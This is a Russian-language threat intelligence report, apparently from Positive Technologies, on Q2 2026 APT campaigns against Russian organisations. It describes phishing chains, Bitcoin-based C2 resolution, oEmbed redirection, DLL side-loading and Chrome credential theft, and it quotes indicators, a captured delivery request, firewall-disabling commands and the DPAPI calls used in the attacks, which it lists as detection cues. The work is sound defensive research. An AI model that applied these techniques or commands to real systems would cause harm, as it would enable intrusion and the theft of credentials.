Во втором квартале 2026 года специалисты Threat Intelligence экспертного центра безопасности Positive Technologies (PT ESC) продолжили отслеживать активность группировок, атакующих российские организации. За отчетный период собран и верифицирован массив индикаторов компрометации по результатам расследования инцидентов, мониторинга группировок и анализа образцов вредоносного ПО.

Разбираемся, кто был активнее всего, какие отрасли атаковали чаще прочих и какие технические приёмы группировки использовали с апреля по июнь — от резолва C2-адреса через блокчейн Bitcoin до антибот-шлюзов, отсекающих песочницы.

Общая картина

По итогам квартала зафиксировано 839 уникальных образцов вредоносного ПО, ассоциированных с 17 отслеживаемыми группировками. Тренд остаётся восходящим на протяжении года:

Динамика уникальных образцов АРТ-группировок по кварталам
Динамика уникальных образцов АРТ-группировок по кварталам

Распределение образцов между группировками неравномерное. Больше всего экземпляров пришлось на хакеров из Rare Werewolf — 224, это около 27% от общего объёма. Далее идут DarkGaboon (88), IAmTheKing (72), Goffee (60) и PhantomCore (59). В сумме пять самых активных группировок обеспечили около 60% всех образцов квартала.

Распределение образцов по группировкам (топ-13), Q2 2026
Распределение образцов по группировкам (топ-13), Q2 2026

Помимо активности самих группировок, специалисты классифицировали атакованные организации по отраслям. Лидирует финансовый сектор — 14,8% от всех зафиксированных атак, следом правительственный сектор (13,28%) и технологические компании (13,09%). Далее — организации гражданского общества (8,21%), образование (5,16%), транспорт и логистика (4,97%), здравоохранение (4,87%), производство (4,30%) и энергетика (4,20%). Оставшиеся 27,1% распределены между прочими отраслями.

Наиболее атакуемые сектора экономики, Q2 2026
Наиболее атакуемые сектора экономики, Q2 2026

Ключевые хакерские техники

C2 через блокчейн Bitcoin — главная техническая новинка

Самым заметным нововведением стал механизм, который начала применять группировка Hive0117. Вместо того чтобы прописывать адрес управляющего сервера прямо в теле образца, JS-загрузчик обращается к публичным API mempool[.]space и blockstream[.]info, запрашивает транзакции по заданному BTC-адресу и ищет в них выход типа OP_RETURN. Данные этого выхода — hex-строка — декодируются в ASCII и превращаются в актуальный URL C2. Чтобы обновить адрес сервера, операторам достаточно опубликовать новую транзакцию: вредоносное ПО само C2 не хранит и не запрашивает напрямую.

Сами mempool[.]space и blockstream[.]info — легитимные публичные обозреватели блокчейна, они не относятся к вредоносной инфраструктуре, поэтому заблокировать их как источник угрозы нецелесообразно. Но это не значит, что метод неуловим: сам факт обращения к таким блокчейн-API можно использовать как сетевой индикатор — особенно в сегментах, где подобный трафик нехарактерен для легитимной активности.

Фишинг остаётся доминирующим вектором

Фишинговые email-рассылки зафиксированы у всех рассмотренных в отчёте группировок, но форматы вложений заметно различались:

  • PE-загрузчики под видом бухгалтерских и служебных документов (Hive0117, PseudoGamaredon) — например, «Счет на оплату СМ-28.exe» или «Указания по ракетно-дроновой опасности_498 от 15.06.2026_47.exe»;

  • ZIP-архивы с HTA-файлами (Tolik, XDSpy) и ODT-документы с эксплуатацией CVE-2026-21509 (BO Team);

  • RAR-архивы с BAT-скриптами и AnyDesk-агентом (Rare Werewolf), а также с бэкдором BrockenDoor (BO Team);

  • ZIP-архивы с LNK-файлами и JScript-дропперами (NetMedved);

  • документы Microsoft Office с вредоносными шаблонами, подгружаемыми по HTTP со скомпрометированных легитимных ресурсов (CloudAtlas).

Отдельно стоит история с классическим business email compromise: группировка Tolik рассылала вредоносные архивы от имени генерального директора организации, подведомственной одному из министерств России. Письмо прошло спам-фильтры, поскольку отправлялось через легитимный почтовый сервер скомпрометированного отправителя (SPF-проверка была пройдена), а в качестве PDF-приманки использовался похищенный внутренний документ той же организации.

Доставка через публичные веб-сервисы и oEmbed-цепочки 

Группировки CloudAtlas и NetMedved прятали конечную инфраструктуру за промежуточными публичными веб-сервисами. CloudAtlas маршрутизировала загрузку HTA-файла через WordPress-сайты с открытым oEmbed API — через эндпойнт /wp-json/oembed/1.0/embed/. Вместо прямого обращения к серверу с полезной нагрузкой заражённый документ обращался к промежуточному WordPress-сайту, а адрес конечного ресурса передавался внутри параметра url.

Пример из сетевого дампа:

GET /kfm/?wp-json/oembed/1.0/embed/url=https3A2F2Felrionosune.unlu.edu.ar2F/mozzetta HTTP/1.1

Host: cliente.k4marcas.com.br

Здесь cliente.k4marcas.com[.]br — видимый промежуточный ресурс, а elrionosune.unlu[.]edu[.]ar/mozzetta — скрытый конечный узел, спрятанный внутри oEmbed-запроса. Трафик выглядит как обычное обращение к WordPress/oEmbed API, а реальный источник следующего этапа доставки прячется в параметре запроса.

NetMedved использовала похожую схему через собственный redirector-домен crop.sh и аналогичный oEmbed-эндпойнт — для доставки AES-128-CBC-зашифрованного PowerShell-стейджера второго этапа.

Закрепление: планировщик задач и ключи автозапуска

Планировщик задач Windows применялся сразу несколькими группировками:

  • Tolik создавала задачу AsanaPro\Old\Properties, запускавшую JS-стилеры через wscript.exe каждые 5 минут;

  • NetMedved закрепляла NetSupport RAT через скрытую задачу планировщика в сочетании с ключом Run (в LNK-сценарии);

  • Rare Werewolf создавала задачу автозапуска AnyDesk-агента при включении хоста.

Ключи автозапуска в реестре использовались параллельно:

  • NetMedved применяла ключ Run для закрепления NetSupport RAT — в JScript-сценарии он был основным механизмом закрепления, с дополнительным ключом автозагрузки;

  • CloudAtlas прописывала автозапуск VBShower/PowerCloud через ключ TrustedInstaller в ветке HKCU\...\CurrentVersion\Run.

Антибот-фильтрация исследовательской среды

XDSpy развернула на доменах инфраструктуры (copperlab[.]org, zumwalt[.]net, kotaka[.]org) шлюз фильтрации трафика на базе обфусцированного JavaScript. Шлюз профилирует среду исполнения и детектирует sandbox-окружения, headless-браузеры (Selenium, Playwright, Puppeteer), поисковые краулеры и исследовательские VM — через проверки navigator.webdriver, значений outerWidth/outerHeight и языковых настроек браузера. Клиентам, не прошедшим проверку, возвращается список сработавших проверок через параметр failedChecks. Реальная полезная нагрузка выдаётся только подлинным пользователям.

Эксплуатация уязвимостей клиентского ПО и DLL Side-Loading

BO Team применяла CVE-2026-21509 — обход защиты OLE в Microsoft Office (CVSS 7.8) — в кампании от имени многопрофильного медицинского центра: при открытии специально сформированного ODT-документа уязвимость позволяет выполнить произвольный код без дополнительных действий пользователя.

XDSpy использовала DLL Side-Loading: в архив включался легитимный HMMA2A6S1C.exe, при запуске которого механизм поиска DLL Windows подгружал вредоносную d3d9.dll вместо системной. Пользователю при этом демонстрировался PDF-документ-приманка, переименованный в test.cfg, маскирующий фоновое выполнение.

Кража учётных данных

Tolik включала в цепочку атаки модуль извлечения мастер-ключа шифрования Google Chrome из файла Local State через Windows DPAPI: ключ сохранялся в TXT-файл и использовался для расшифровки паролей, cookies и данных из SQLite-базы Login Data.

Шпионские группировки: профили и цепочки атак

Rare Werewolf (он же Librarian Ghouls, Librarian Likho, Rezet)

Активна с 2019 года, атакует Россию, Венгрию, Казахстан и Беларусь; в арсенале — AnyDesk, Blat, DefenderControl, MipkoEmployeeMonitor, Tuna. Список атакуемых отраслей у группировки один из самых широких — от авиационной и аэрокосмической промышленности до розничной торговли и энергетики.

Атака начинается с PE-загрузчика в письме: при запуске он открывает PDF-приманку и загружает с C2-домена защищённый паролем RAR-архив с BAT-скриптом. Запущенный BAT-скрипт:

  • устанавливает на заражённом хосте агент AnyDesk с паролем для удалённого доступа к сессии;

  • создаёт задачу в планировщике Windows на запуск AnyDesk при включении хоста;

  • упаковывает экземпляр AnyDesk в архив с паролем;

  • эксфильтрует этот архив по SMTP с помощью утилиты Blat, передавая имя заражённого хоста в заголовке письма.

Получив доступ через AnyDesk-сессию, группировка доставляет PE-дроппер, который запускает документ-приманку и загрузчик следующей стадии — тот скачивает с C2 защищённый паролем RAR-архив со стилером. Стилер рекурсивно собирает файлы DOC, DOCX, RTF и TXT размером от 1 до 50 МБ (игнорируя ряд системных директорий), архивирует их и отправляет по SMTP через .NET-библиотеку MailKit на адрес в той же доменной зоне, что и инфраструктура первой стадии. Чтобы скрыть PE-лоадеры от пользователя, группировка использует стороннее ПО «4t Tray Minimizer», сворачивающее окна приложений в трей.

Документ-приманка 
Документ-приманка 

Для детектирования мы рекомендуем специалистам ориентироваться на следующие моменты:

  •  запуск BAT-файлов из нетипичных пользовательских каталогов (например, %appdata%\windows\any.bat); 

  • закрепление в автозагрузке через HKCU\Software\Microsoft\Windows\CurrentVersion\Run со значениями, указывающими на исполняемые файлы из %AppData%, %LocalAppData% или %Temp%

  • исполняемые файлы, имитирующие системные бинарники (например, find.exe, запущенный не из системной директории и не подписанный Microsoft); 

  • сокрытие рабочей директории через attrib.exe +s +h; попытки отключить защитные механизмы (sc stop mpssvc, sc delete mpssvc, netsh advfirewall set allprofiles state off);

  •  подозрительные исходящие SMTP-сессии, особенно от нетипичных процессов, в сочетании с созданием защищённых паролем RAR-архивов и массовым чтением DOC/DOCX/RTF/TXT.

PseudoGamaredon (aka GamaCopy, Core Werewolf, Awaken Likho)

Документ-приманка
Документ-приманка

Активна с 2023 года в России и Беларуси, использует MeshAgent, RemoteAdmin, UltraVNC и UPX. Сохраняет характерный вектор — фишинг с документами-приманками военной и государственной тематики: «Указания по ракетно-дроновой опасности», «Уведомление о начале комплексной проверки согласно плану утечек», «Запрос прокуратуры — анализ соблюдения законности при выполнении ГОЗ предприятиями ОПК РФ», «Указания начальникам военных представительств». Выбор приманок указывает на таргетинг сотрудников оборонно-промышленного комплекса и военных представительств.

Архив с вредоносным исполняемым файлом 
Архив с вредоносным исполняемым файлом 

При запуске дроппер извлекает PDF-приманку и исполняемый файл второй стадии. В одном из образцов второй стейдж сохранялся во временный каталог под именем integrated.exe, а запуск выполнялся через командную строку после искусственной задержки командой ping.exe -n 38 127.0.0.1. Второй стейдж собирает имя компьютера, листинг рабочего стола, список запущенных процессов и сведения о сетевых адаптерах, сериализует всё в JSON, кодирует в Base58 и отправляет на C2, после чего выполняет периодические GET-запросы к отдельному эндпойнту.

Tolik (он же Fairy Werewolf)

Фишинговое письмо
Фишинговое письмо

Активна с 2024 года, атакует Россию и использует инструменты Unicorn и Remcos. 

В мае 2026 года PT ESC зафиксировала атаку Tolik на предприятие ОПК: письмо было отправлено с почтового ящика генерального директора организации, подведомственной одному из министерств России, и успешно прошло спам-фильтры — SPF-запись соответствовала легитимному серверу, что говорит о полной компрометации почтового ящика отправителя. Это классический business email compromise: вредоносные архивы рассылаются от имени доверенного контрагента.

Во вложении — PDF-приманка (похищенный внутренний документ скомпрометированной организации) и ZIP-архив «Приложения Исх № 14-13422Ц.zip» с тремя HTA-файлами. Запуск любого из них распаковывает набор JavaScript-скриптов в директорию C:\Users\admin\AppData\Local\SevenZipped\ и создаёт задачу планировщика AsanaPro\Old\Properties для их запуска каждые 5 минут через wscript.exe.

Дальше скрипты запускают PowerShell-команду, которая извлекает мастер-ключ шифрования паролей Google Chrome из файла Local State, расшифровывает его через DPAPI и сохраняет в TXT-файл — этот ключ используется для расшифровки паролей, cookies и данных браузера из SQLite-базы Login Data. Параллельно скрипты подгружают с C2 дополнительный вредоносный модуль.

Для детектирования предлагаем ориентироваться на:

  • события создания задач планировщика с исполняемыми командами вида wscript.exe, cscript.exe, mshta.exe, powershell.exe и другими LOLBins; запуск powershell.exe со скрытым окном (-WindowStyle Hidden); 

  • обращение к файлу Chrome Local State; использование DataProtectionScope::CurrentUser, ConvertFrom-Json, FromBase64String, ProtectedData::Unprotect

  • запись результата в пользовательскую директорию через Set-Content.

BO Team (Lifting Zmiy, Hoody Hyena)

Активна с 2024 года, атакует Россию; в ее  арсенале — BrockenDoor, Reverse SSH, DarkGate, Remcos, Babuk, ZeroSSH, Mythic, Cobalt Strike, Znkit. В мае 2026 года группировка зарегистрировала на один email leonorisbruscatti@gmail[.]com восемь C2-доменов и восемь соответствующих C2-серверов для управления заражёнными BrockenDoor хостами. Уже в середине месяца эта инфраструктура была задействована в фишинговой кампании от имени Роскомнадзора: жертвам рассылались поддельные уведомления о выявленных правонарушениях с RAR-архивом «Акт контрольного (надзорного) мероприятия.rar», содержащим исполняемые файлы бэкдора BrockenDoor (замаскированные под файлы «Форма письменных пояснений.exe» и «Уведомление_Роскомнадзор») и файлы-приманки в виде PDF-сканов.

Заражённый процесс собирал MachineGuid, ComputerName, данные о версии Windows, типе установки, языковых параметрах, а также проверял ассоциации файлов и наличие офисного ПО. Сетевое взаимодействие велось с одним управляющим узлом — zoonoz[.]space, эндпойнт /t методом POST через 443/tcp, с одинаковым User-Agent (Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0).

Вредоносные домены
Вредоносные домены

В июне 2026 года группировка рассылала письма уже от имени многопрофильного медицинского центра — с архивом, содержащим ODT-документ, эксплуатирующий уязвимость CVE-2026-21509 (обход защиты OLE в Microsoft Office, уровень критичности по шкале CVSS 7.8). Уязвимость позволяет неаутентифицированному злоумышленнику выполнить произвольный код при открытии документа. 

Фишинговое письмо
Фишинговое письмо

XDSpy (Dwarf Werewolf, Silent Werewolf)

Активна с 2022 года, география атак самая широкая среди рассмотренных группировок: Россия, Сербия, Украина, США, Казахстан, Беларусь, Молдова. Группировка использует инструменты собственной разработки: DSDownloader, XDigo, Netrunner, XDDown, XDUpload, XDRecon, XDList, DigoLoader.

В начале мая 2026 года команда PT ESC зафиксировала фишинговую кампанию XDSpy под видом деловой переписки по теме «Протокол разногласий», отправленную через скомпрометированную (или используемую без согласия владельца) почтовую инфраструктуру — это позволяло письму проходить SPF-проверку. В HTML-теле письма была ссылка на домен mishustincouncil[.]com — сайт-заглушка на тему экологической сертификации, не имеющий отношения ни к отправителю, ни к теме письма.

Фишинговый сайт 
Фишинговый сайт 

При переходе по ссылке пользователь попадал на страницу с обфусцированным JavaScript, имитирующую промежуточный экран проверки «One moment, please...». Скрипт профилировал среду исполнения и решал, реальный ли это пользователь или автоматизированная среда анализа. Если проверка проходила успешно, сервер отдавал архив с LNK-файлом и замаскированным архивом gab.h; запуск LNK распаковывал gab.h и скрытно запускал U237I22HPG.exe вместе с вредоносной DLL — классическая схема DLL Side-Loading, когда легитимный exe-шник подгружает вредоносную библиотеку вместо системной. Если проверка не проходила, сервер отдавал файл-заглушку без полезной нагрузки.

Дополнительная инфраструктура группировки — домены copperlab[.]org, zumwalt[.]net и kotaka[.]org — работала по той же схеме антибот-фильтрации: проверялись navigator.webdriver, headless-режим в userAgent и appVersion, несоответствия в navigator.plugins и navigator.mimeTypes, языковые настройки, outerWidth/outerHeight, а также артефакты Selenium, Playwright, Puppeteer, песочниц и исследовательских VM. Список сработавших проверок передавался на backend через параметр failedChecks.

Cloud Atlas (Сloud Werewolf, Blueodin, Oxygen, Clean Ursa, ATK116, G0100, Inception)

Активна с 2014 года — одна из старейших группировок в отчёте, с самой широкой международной географией: Россия, Афганистан, Малайзия, Азербайджан, Беларусь, Бельгия, Молдова, Болгария, Канада, Португалия. Инструменты: VBCloud, PowerShower, VBShower, CloudAtlas.

В мае 2026 года PT ESC обнаружила кампанию с характерными для группировки документами Microsoft Office со встроенными вредоносными шаблонами и многоступенчатой цепочкой доставки HTA- и VBS-компонентов. Шаблон при открытии документа загружается со скомпрометированных легитимных ресурсов в национальных доменных зонах Бразилии, Аргентины и Индонезии — эту технику PT ESC впервые зафиксировала у CloudAtlas в апреле 2026 года в ходе исследования связи группировки с брокером первоначального доступа Mustard Tempest.

Новое в этой кампании — переход от прямых HTTP-запросов к механизму oEmbed для сокрытия конечной инфраструктуры (см. раздел выше). Часть обнаруженных документов по тематике и оформлению ориентирована на аудиторию из Ирака — нетипичная для CloudAtlas география.

Полезная нагрузка — обфусцированный HTA-дроппер, создающий рабочую директорию %APPDATA%\Microsoft\Windows\WebCache\ (маскировка под системный путь) и извлекающий туда три модуля: WebCachea54.vbs, WebCachea54.jfm, WebCachea54tmp0.vbs. Закрепление — через ветку реестра HCU\Software\Microsoft\Windows\CurrentVersion\Run. WebCachea54.vbs реализует многоступенчатую декодировку: извлекает из .jfm-файла закодированную строку, декодирует её и выполняет как VBS-код, порождая дроппер третьего уровня с ещё одной закодированной полезной нагрузкой.

Итог цепочки — обфусцированный VBS-лоадер, который собирает имя домена и имя пользователя заражённого хоста и встраивает их в User-Agent исходящих запросов. Загрузчик тянет из арсенала группировки инструменты VBShower и PowerCloud, которые выполняют эксфильтрацию данных и взаимодействие с C2-инфраструктурой через сервис Google Sheets.

Финансово мотивированные группировки

Hive0117 (Watch Wolf, Ratopak Spider, UAC-0008)

Активна с 2022 года, атакует Россию, Литву, Эстонию, Украину, США и Латвию; инструменты — DarkWatchman, Buhtrap, FlawedAmmyy, UltraVNC. Группировка делает рассылки со скомпрометированных почтовых ящиков на финансовую тематику («Задолженность по оплате», «Счет на оплату», «Акт сверки»), целевая аудитория — сотрудники финансовых департаментов. Образцы вредоносов маскируются под бухгалтерские документы (например, «Счет на оплату СМ-28.exe»), представляют собой C++-бинарники, которые расшифровывают и запускают обфусцированный JS-код-загрузчик через Windows Script Host командой wscript.exe /E:jscript "%s" %d. Такую тенденцию мы отмечали и в первом квартале.

Главное изменение второго квартала — уже упомянутый переход на получение C2 через блокчейн Bitcoin. Скрипт обращается к mempool[.]space/api/address/{BTC-адрес}/txs (или, если недоступен, к аналогичному эндпойнту blockstream[.]info), получает список транзакций и ищет в ответе подстроку "scriptpubkey":"6a" — признак выхода OP_RETURN. Данные после этого маркера декодируются из hex в ASCII и образуют итоговый URL C2.

Содержимое ответа сервера 

В ходе анализа в изолированной среде наши специалисты подтвердили обращение к адресу bc1qtnkl7eshwh0ny8xmheefcw9lk6np5wptc4m7lu: в одной из транзакций найден OP_RETURN-выход, декодирующийся в http://199.91[.]221[.]19:80/index.php. Этот же IP фиксировался как получатель регулярных POST-запросов от образца в течение всего сеанса анализа. По сути, адрес в блокчейне работает как dead-drop resolver: операторы публикуют транзакцию с нужным адресом C2, а вредоносное ПО просто отслеживает историю транзакций по этому адресу, не обращаясь к серверу напрямую до момента резолва.

NetMedved (Clubfoot Wolf)

Активна с 2024 года, атакует Россию; инструменты — NetSupport и Lumma. PT ESC зафиксировала летнюю фишинговую кампанию с деловой тематикой — заявки на закупку от имени российских компаний — и легитимным инструментом NetSupport Manager, развёрнутым в системе жертвы как RAT. Выявлено два сценария доставки.

Первый — вредоносный LNK-файл под видом заявки на закупку: он выполняет закодированную в Base64 PowerShell-команду, которая через redirector-домен crop[.]sh обращается к sunlightfriends[.]tech и получает AES-128-CBC-зашифрованный PowerShell-код второго этапа. После расшифровки и выполнения в памяти этот код загружает ZIP-архив, распаковывает его в %LOCALAPPDATA% и разворачивает NetSupport RAT с закреплением через ключ автозапуска в реестре.

Второй сценарий — ZIP-архив с JScript-файлом под тем же прикрытием. В отличие от LNK-варианта, JScript-дроппер извлекает документ-приманку и компоненты NetSupport Client прямо из собственного тела через декодирование bin.base64, не обращаясь к внешней инфраструктуре, и закрепляется сразу двумя способами — скрытой задачей планировщика и ключом автозапуска. Ретроспективный анализ показал, что аналогичная JScript-цепочка применялась группировкой с 2024 года — с тем же payload (NetSupport RAT) и близким шаблоном именования файлов-приманок.

Несмотря на полную смену инфраструктуры между кампаниями, у обоих вариантов совпадают атрибутивные признаки: одна и та же сборка NetSupport RAT 2017 года, парная схема gateway-серверов в конфигурации client32.ini и идентичное значение SecurityKey2. Из нового в кампании 2026 года — собственный redirect-слой (crop[.]sh), многоуровневое AES-шифрование полезной нагрузки и инфраструктурная кластеризация: пять из семи C2-доменов зарегистрированы в один день, 27.04.2026. Подробный разбор цепочки атаки PT ESC публиковала в статье «NetMedved и летняя кампания против российских организаций».

Выводы

Во втором квартале этого года активность отслеживаемых группировок сохранила высокий уровень предыдущего: зафиксировано 839 уникальных образцов вредоносного ПО, что на 88% больше, чем во втором квартале 2025 года, при этом основной вклад внесли несколько наиболее активных группировок. Рост образцов сопровождается заметным перераспределением целевых приоритетов: атакующие активизировали операции против социально значимых секторов экономики — образования, здравоохранения, транспорта и производства, одновременно сохраняя давление на государственные структуры и финансовый сектор.

В рейтинге активных группировок произошли изменения, связанные как с абсолютными показателями активности, так и с переориентацией мотивации. Rare Werewolf продолжает демонстрировать высокий уровень активности и сохраняет доминирующую позицию. Одновременно растёт число образцов вредоносного ПО от финансово мотивированных хакеров, включая DarkGaboon и Hive0117, которые активизировали рассылки, нацеленные на финансовые подразделения организаций. Тем не менее группировки, ориентированные на шпионаж, остаются доминирующей силой в ландшафте угроз: PhantomCore, CloudAtlas и IAmTheKing сохраняют стабильно высокую активность, атакуя государственные структуры, оборонно-промышленный комплекс и исследовательские организации.

Ключевым вектором первоначального доступа остаётся фишинг: злоумышленники активно используют деловую, финансовую и государственную тематику, а также скомпрометированные легитимные почтовые ящики для повышения доверия и обхода базовой фильтрации. Наблюдается системное усложнение цепочек доставки и управления — использование легитимных публичных сервисов и взломанных сайтов как промежуточных узлов для маскировки управляющих серверов, применение легитимных инструментов удалённого администрирования, закрепление через планировщик задач и нестандартные способы получения адреса C2, включая блокчейн Bitcoin.

Для снижения рисков организациям стоит усиливать контроль почтовых вложений и ссылок, отслеживать подозрительные сценарии запуска через Windows Script Host, PowerShell, планировщик задач и ключи автозапуска, контролировать использование средств удалённого доступа и регулярно обновлять правила детектирования на основе актуальных IoC и TTP.

С полной версией исследования можно ознакомиться на нашем сайте.

Департамент Threat Intelligence экспертного центра безопасности Positive Technologies

Комментарии (0)